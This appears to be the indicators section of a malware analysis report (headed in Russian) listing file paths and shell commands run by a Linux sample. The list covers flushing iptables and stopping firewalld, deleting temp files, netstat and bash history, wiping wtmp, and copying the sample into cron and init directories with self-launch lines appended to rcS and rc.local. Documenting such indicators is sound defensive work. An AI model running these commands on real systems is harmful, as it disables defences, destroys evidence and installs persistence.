Техническая информация
- /etc/cron.d/<SAMPLE>
- /etc/rc0.d/<SAMPLE>
- /etc/init.d/<SAMPLE>
- /etc/init.d/rcS_bak
- /etc/init.d/rcS
- /etc/rc.local
- /sbin/iptables -F
- /sbin/iptables -X
- service iptables stop
- systemctl stop iptables.service
- service firewalld stop
- systemctl stop firewalld.service
- sh -c rm -rf /tmp/* /var/tmp/*
- rm -rf /tmp/* /var/tmp/*
- sh -c cat /dev/null > /var/log/wtmp
- cat /dev/null
- sh -c rm -rf /bin/netstat
- rm -rf /bin/netstat
- sh -c service iptables stop
- sh -c /sbin/iptables -F; /sbin/iptables -X
- sh -c service firewalld stop
- sh -c rm -rf ~/.bash_history
- rm -rf /root/.bash_history
- sh -c history -c
- sh -c /bin/busybox cp <SAMPLE_FULL_PATH> /etc/cron.d/
- /bin/busybox cp <SAMPLE_FULL_PATH> /etc/cron.d/
- sh -c /bin/busybox cp <SAMPLE_FULL_PATH> /etc/rc0.d/
- /bin/busybox cp <SAMPLE_FULL_PATH> /etc/rc0.d/
- sh -c /bin/busybox cp <SAMPLE_FULL_PATH> /etc/init.d/
- /bin/busybox cp <SAMPLE_FULL_PATH> /etc/init.d/
- sh -c /bin/busybox cp /etc/init.d/rcS /etc/init.d/rcS_bak
- /bin/busybox cp /etc/init.d/rcS /etc/init.d/rcS_bak
- sh -c /bin/busybox echo 'cd /etc/cron.d/;<SAMPLE_FULL_PATH> self.load;cd' >> /etc/init.d/rcS
- /bin/busybox echo cd /etc/cron.d/;<SAMPLE_FULL_PATH> self.load;cd
- sh -c /bin/busybox echo 'cd /etc/init.d;<SAMPLE_FULL_PATH> self.load;cd' >> /etc/init.d/rcS
- /bin/busybox echo cd /etc/init.d;<SAMPLE_FULL_PATH> self.load;cd
- sh -c /bin/busybox echo 'cd /etc/rc0.d;<SAMPLE_FULL_PATH> self.load;cd' >> /etc/init.d/rcS
- /bin/busybox echo cd /etc/rc0.d;<SAMPLE_FULL_PATH> self.load;cd
- sh -c echo 'cd /etc/cron.d/;<SAMPLE_FULL_PATH> self.load;cd' >> /etc/rc.local
- sh -c echo 'cd /etc/init.d;<SAMPLE_FULL_PATH> self.load;cd' >> /etc/rc.local
- sh -c echo 'cd /etc/rc0.d;<SAMPLE_FULL_PATH> self.load;cd' >> /etc/rc.local
- /var/log/wtmp
- /tmp/*
- /var/tmp/*
- /bin/netstat
- /root/.bash_history